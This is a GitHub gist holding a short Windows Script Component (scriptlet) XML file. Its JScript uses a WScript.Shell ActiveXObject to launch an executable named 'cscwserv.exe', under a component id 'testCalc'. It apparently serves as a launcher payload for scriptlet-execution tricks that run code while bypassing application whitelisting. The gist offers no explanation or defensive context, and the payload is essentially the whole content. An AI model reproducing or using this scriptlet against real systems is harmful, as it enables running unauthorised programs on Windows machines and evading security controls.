Skip to content

Instantly share code, notes, and snippets.

@negativelol
Last active August 2, 2018 17:06
Show Gist options
  • Save negativelol/dc851669ef5ad277afbf46bfbc1bca44 to your computer and use it in GitHub Desktop.
Save negativelol/dc851669ef5ad277afbf46bfbc1bca44 to your computer and use it in GitHub Desktop.
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cscwserv.exe");
]]>
</script>
</component>
</package>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment